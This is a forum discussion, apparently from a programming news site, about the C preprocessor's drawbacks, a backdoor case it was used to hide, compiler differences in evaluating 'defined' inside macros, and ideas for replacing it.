The C preprocessor is a horrendous way of doing metaprogramming that was implemented because it was relatively easy to do as a separate pass. There's a reason why very few other languages have done it this way.
A good knowledge of the preprocessor is essential for writing obfuscated and underhanded C. For example, the lucky7coin backdoor: https://github.com/alerj78/lucky7coin/issues/1
IMO, whether or not the C preprocessor is good depends on what you're trying to do and how you do it. I doubt there are any preprocessors or macro systems that can't be used to obfuscate code; that's basically the definition of what they do: modify your code before you compile it. Obviously, any strange or unexplained preprocessor usage should be examined and preferably removed.
The example you gave is not really fair, though, because it seems pretty obvious to me that nobody ever looked at that code; it hardly matters that they hid the backdoor in the C preprocessor. If you take a look at the repo, it only has three commits, with the first one (https://github.com/alerj78/lucky7coin/commit/07d7e5fc53e5673...) being a supposed import of the code from the repo it used to live in, and it's in this commit that the backdoor was inserted. The real issue is that people were running code from someone who appears to be a complete unknown, who has no history for his code, and they just assumed it was the same as the old code without checking.
Preprocessors are uniquely problematic in this regard, though, since they're just simple text-substitution engines. Things like templating (as in C++), in-language macros (as in Lisp variants), or language-level metaprogramming facilities (as in Ruby, Python, ...) all have access to actual entities in the language, which constrains their effects in a way that's safer and easier to reason about.
I'm not looking to deny that straight text substitution has its drawbacks; you're completely right. That said, I still don't see it as big a deal as it seems. Generally speaking, bad or malicious preprocessor abuse like this sticks out like a sore thumb when you're reviewing code, and if you don't have anybody reviewing the code then it doesn't really matter how the backdoor was disguised. At least with the C preprocessor, if there's something you're unsure about, you can run the preprocessor separately and look at the output, clearing up all doubt over what it does.
Also worth noting, one of the nicer things about the design of the C preprocessor is that it can be applied to a lot of different file types. In more complicated low-level C projects, you can run the preprocessor over your C code, assembly code, linker scripts, etc., which is a huge gain since you have access to all your constants and simple macros everywhere, simplifying work and reducing duplication. You can't get that with something tied to the language, which is unfortunate, because like you said it's better to avoid the preprocessor, since writing things at the language level makes them much easier to reason about.
It seems to me that you could create something at least this devious using C++ templates and operator overloading. I wouldn't bet against it in the other languages you mention, either.
This is so absurdly simple and yet devastating. Reading some of the comments on the Github issue you posted, this stood out (I don't know anything about lucky7coin):
> So disappointing such code was not reviewed by Vern and team before running it on the server where damage could result.
So this code was actually put into production somewhere at some point -- wow. And a cursory code review and compiling from source will do absolutely nothing here.
That often expands into hundreds of thousands of lines, though. It's more routine to go backdoor-hunting in binaries; you've given me the interesting idea of running `strings` on the binary and looking for anything that's not in the source.
Exactly. If the preprocessor respected file scope, or better yet namespace scope, it would be much, much better. The way it works now, there is no encapsulation: a preprocessor definition in one library header will inadvertently affect code in other libraries, depending on the order in which they happen to be included and compiled. It's such a mess it's embarrassing we still put up with it in the year 2015.
Oh, I have the sources. I haven't lost anything. Why I don't host that project anywhere is that I'm not all that proud of it.
I worked for one startup some years ago whose guys looked at that thing before they hired me and liked it.
MPP has namespaces, and it also tries to preserve whitespace (expansions occurring at some indentation level are indented). It could be used for Python, in theory.
Thinking along those lines, I posted to a Python newsgroup around then: reactions were mixed:
Interesting. I don't think I ever tried to use a macro in the conditional expression of a #if, except inside a defined() or undef(). From my time on the C committee, I recall that the preprocessor was a royal pain to get right. It has its own set of token rules that aren't the same as C itself, for example.
I am also reminded of the button I used to have that said, "Defining define is undefined."
This doesn't seem quite right. Did you maybe mean "#undef FOO" or "!defined(FOO)"? Whether BAR gets expanded or not, in your example it looks like it would always evaluate true. Or am I misunderstanding the ambiguity?
It might be telling that I also don't understand the Clang bug report as written. I think there are typos in the examples. Is the switch from "HAVE_FOO_BAR" to "HAVE_FOO" in the first example intentional? Is the construct "#defined" (with a final 'd') intentional in the second?
I'm not sure -- I'm going off what the Clang bug says. They have a spec ref in there. (Note that you can't trust your intuition on how compilers work, you can only trust the spec and experiments.)
If it helps any here is the real-world code where this problem came up:
#define FOO
#define BAR defined(FOO)
#if BAR
#error "true"
#else
#error "false"
#endif
Clang, GCC, and ICC evaluate the "true" branch, while MSVC evaluates the "false" branch.
For the same test code with first line changed to "undef":
#undef FOO
#define BAR defined(FOO)
#if BAR
#error "true"
#else
#error "false"
#endif
MSVC, Clang, GCC, and ICC all agree on "false".
Importantly, though, when used with "/Wall", MSVC gives this warning in both cases:
main.cpp(3): warning C4668: 'definedFOO' is not defined as
a preprocessor macro, replacing with '0' for '#if/#elif'
None of the other three compilers give any warnings, even with "-Wall -Wextra -pedantic". So there definitely is a difference in behavior, but I don't think it's actually the one that's presumed in that bug.
For further experimentation, Clang, GCC, and ICC can be tested online here: http://gcc.godbolt.org/
#2 is incorrect. Being sensitive to line breaks does not make a grammar context-sensitive. It just means you have to treat line breaks as tokens rather than ignorable whitespace (which is exactly what the context-free grammar given in the C11 standard does).
Same with the bit about concatenating tokens. Every single one of those examples has a static parse tree, which, for the C preprocessor, is a sequence of tokens and directives. The author seems to be confusing the preprocessor's parse tree with the effect it has on the underlying text.
(Yes, the output of the preprocessor is dependent on what you define, but that has nothing to do with the grammar. What the author claims is like saying a Lisp is context-sensitive because the factorial function produces different values for different inputs!)
Now, if you could do this:
#define foobar define
#foobar x 123
x
and get "123", that would be a context-sensitive grammar. But that is NOT a thing you can do!
I hate to say it, but I was rather unimpressed by this list, and nothing in it surprised me. While I certainly agree that the C preprocessor is a relic, and has not weathered the test of time well, I would suggest that a number of the supposed infelicities mentioned in this article stem from the misleading idea that the preprocessor is an integral part of the C language proper, when it is better thought of as its own language (and one that was traditionally done by a completely separate program). The preprocessor does things differently than the rest of C, because it's not C. It is a text-processing language of convenience, provided specifically for doing things that C itself cannot (or should not) do.
I've written a C preprocessor and I agree that the language standard documents are ambiguous and incomplete. The best I could do was hack on it until it matched GCC's preprocessor well enough to compile Linux.
I don't recall all the horrid details, but one case that I do remember driving me nuts was the use of #if/#endif in the argument to a function-like macro.
Has there been any notion of a replacement Meta/Macro language for C? Something open source. Of course pre-preprocessing one's files and the complexity that might add to the build system are unattractive but I'd still be interested if someone has attacked this problem.
Much of what makes 'C' annoying can be made less painful by referring to static/const struct tables/arrays. Those are a prime candidate for generation.
You don't have to keep the preprocessing of files as part of the mainline build, but there's something to be said for it - sort of "make GENERATE_ALL_THE_THINGS" might run the preprocessing { Python/Tcl/Perl/bash/even 'C' } scripts for you.
If the generators just emit .h files, that can be pretty good. You're still left with something #ifdef-ey to select them, based on #defines or -D options.
You might even go so far as to dynamically load these tables if that can make sense. The ld linker can directly link in blobs.
The module and template features (along with static if, if the committees figure out what to do in that area) in the newest versions of C++ together get pretty close to replacing the C preprocessor.
My school of thought would be to limit it to just #include, #if, #else, #endif, and non-recursive, single-word-only #define / #undef. Force everything to one directive per line, and call it a day.
Macros should always be the absolute last resort for doing anything. Stepping through code in gdb with some "creative" macro-based API is almost as bad as C++.
I've seen 'C' macros used to do template-ey things that probably improved the readability of the code (once you got used to the fact that the macros were there at all).
More modern compilers allow using non-static "const" constructs to do much of the same, which is a great improvement.
You'll forgive me if my knowledge is a bit dated. I largely work on tools integration these days and don't do much in the way of framework development, but aren't macros pretty much the de facto way of doing reflection/RTTI? Actually, almost every mature framework I've worked with in the past used macros to mark up class properties, register types, etc.
I'm 95% sure the last example in #3 is undefined behaviour. #(a b c) is not valid, so a compiler that evaluates it through multiple levels of indirection instead of erroring out probably has a bug.
And the last 3 or 4 are odd, but were needed for some of the hacks of the early days of C (and some are almost certainly still used in the Linux kernel source today).